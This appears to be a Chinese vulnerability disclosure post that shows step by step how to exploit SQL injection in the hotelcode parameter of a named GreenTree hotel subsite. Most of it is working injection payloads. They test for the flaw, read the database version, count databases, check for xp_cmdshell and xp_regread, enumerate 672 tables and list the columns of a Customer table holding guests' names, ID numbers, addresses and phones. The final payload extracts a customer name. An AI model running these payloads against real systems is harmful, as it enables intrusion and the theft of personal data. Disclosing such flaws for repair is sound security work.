格林豪泰酒店某分站存在SQL注入漏洞:8080/frontinvest/roomdetail.aspx?hotelcode=531001

格林豪泰酒店某分站存在SQL注入漏洞


输入'and'1'='1

格林豪泰酒店某分站存在SQL注入漏洞


输入'and'1'='2

格林豪泰酒店某分站存在SQL注入漏洞


查看数据库版本
:8080/frontinvest/roomdetail.aspx
?hotelcode=531001' and 1=(select @@VERSION) and '1'='1

格林豪泰酒店某分站存在SQL注入漏洞


当前数据库名

格林豪泰酒店某分站存在SQL注入漏洞


本地服务名

格林豪泰酒店某分站存在SQL注入漏洞


格林豪泰酒店某分站存在SQL注入漏洞


24个数据库
:8080/frontinvest/roomdetail.aspx
?hotelcode=531001' and 24= (select count(name) from master.dbo.sysdatabases) and '1'='1

格林豪泰酒店某分站存在SQL注入漏洞


XP_CMDSHELL存在
:8080/frontinvest/roomdetail.aspx?
hotelcode=531001' and 1= (Select count(name) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') and '1'='1

格林豪泰酒店某分站存在SQL注入漏洞


XP_regread扩展存储过程存在

格林豪泰酒店某分站存在SQL注入漏洞


爆表
:8080/frontinvest/roomdetail.aspx?
hotelcode=531001' and 1= (select top 1 name from sysobjects where xtype='u' ) and '1'='1

格林豪泰酒店某分站存在SQL注入漏洞


格林豪泰酒店某分站存在SQL注入漏洞


select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount')
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist')
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist','Iccard_Request','m_initrebate','Customer')
一共672张表这里就不再一一列出了
:8080/frontinvest/roomdetail.aspx?
hotelcode=531001' and 672= ( select count(name) from sysobjects where xtype='u') and '1'='1

格林豪泰酒店某分站存在SQL注入漏洞


看表字段这里以Customer为例39个字段

格林豪泰酒店某分站存在SQL注入漏洞


如下:
CustomerCode
FirstName
LastName
MiddleName
NickName
Gender
Birthday
NationalityID
Race
Title
Language1
Language2
CustomerTypeID
TravelAgentID
CustomerOrigin
Region1
Region2
Note1
Note2
Company
Address
Telephone
Zip
VisaID
ExpirationDate
IDTypeID
IDNumber
VIPLevel
VIPNumber
CreateDate
UploadFlag
Priority
Mobile
CompanyTel
CompanyFax
MemberType
MemberNo
UploadDate
HotelCode
看一个字段
:8080/frontinvest/roomdetail.aspx
?hotelcode=531001' and 1= (select top 1  FirstName from Customer) and '1'='1

格林豪泰酒店某分站存在SQL注入漏洞